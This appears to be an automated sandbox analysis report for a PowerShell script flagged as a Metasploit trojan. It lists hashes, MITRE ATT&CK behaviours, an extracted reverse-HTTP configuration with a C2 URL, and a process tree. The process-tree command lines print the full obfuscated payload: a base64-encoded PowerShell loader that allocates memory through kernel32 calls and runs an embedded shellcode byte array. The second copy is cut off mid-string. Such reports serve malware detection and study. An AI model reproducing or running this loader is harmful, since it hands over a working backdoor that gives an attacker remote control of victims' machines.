metasploit | 405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431

General

Target

ps1004.ps1
Size

8KB
MD5

1195ad87cfc060272b60133c613b928e
SHA1

d6325814107fd10ba6f63a11ecb5b796553b291b
SHA256

405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431
SHA512

f0609f25c9c95cb6ec6419e6c93332731a621243a02416c4f15b0edcbf7ffc12382c08cd5a65a9fc765b62cb2e8967ca7edee027e726b061d139615588489199
SSDEEP

96:zCTRX/T7Dh9pPKZT3Aasj0AwCATxuc23s5GeaWy7V1Xf4ymxtgqkfuaMk09clOm:zaF7Dh/PO3AaI2LxUlC5xtgqkfhMzcOm

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://192.168.18.129:8080/UY2jjW-iTdaTLZIs9Bq1pQ1u1z9L8

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2776	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execsc.execvtres.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2776	powershell.exe
2456	powershell.exe
2768	powershell.exe
2656	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 2776 wrote to memory of 2456	2776	powershell.exe	31
PID 2776 wrote to memory of 2456	2776	powershell.exe	31
PID 2776 wrote to memory of 2456	2776	powershell.exe	31
PID 2456 wrote to memory of 2768	2456	powershell.exe	32
PID 2456 wrote to memory of 2768	2456	powershell.exe	32
PID 2456 wrote to memory of 2768	2456	powershell.exe	32
PID 2768 wrote to memory of 2656	2768	powershell.exe	33
PID 2768 wrote to memory of 2656	2768	powershell.exe	33
PID 2768 wrote to memory of 2656	2768	powershell.exe	33
PID 2768 wrote to memory of 2656	2768	powershell.exe	33
PID 2656 wrote to memory of 1036	2656	powershell.exe	34
PID 2656 wrote to memory of 1036	2656	powershell.exe	34
PID 2656 wrote to memory of 1036	2656	powershell.exe	34
PID 2656 wrote to memory of 1036	2656	powershell.exe	34
PID 1036 wrote to memory of 1616	1036	csc.exe	35
PID 1036 wrote to memory of 1616	1036	csc.exe	35
PID 1036 wrote to memory of 1616	1036	csc.exe	35
PID 1036 wrote to memory of 1616	1036	csc.exe	35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ps1004.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv FDG -;sv Q ec;sv ZzY ((gv FDG).value.toString()+(gv Q).value.toString());powershell (gv ZzY).value.toString() 'JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUALAAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA=='"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUAL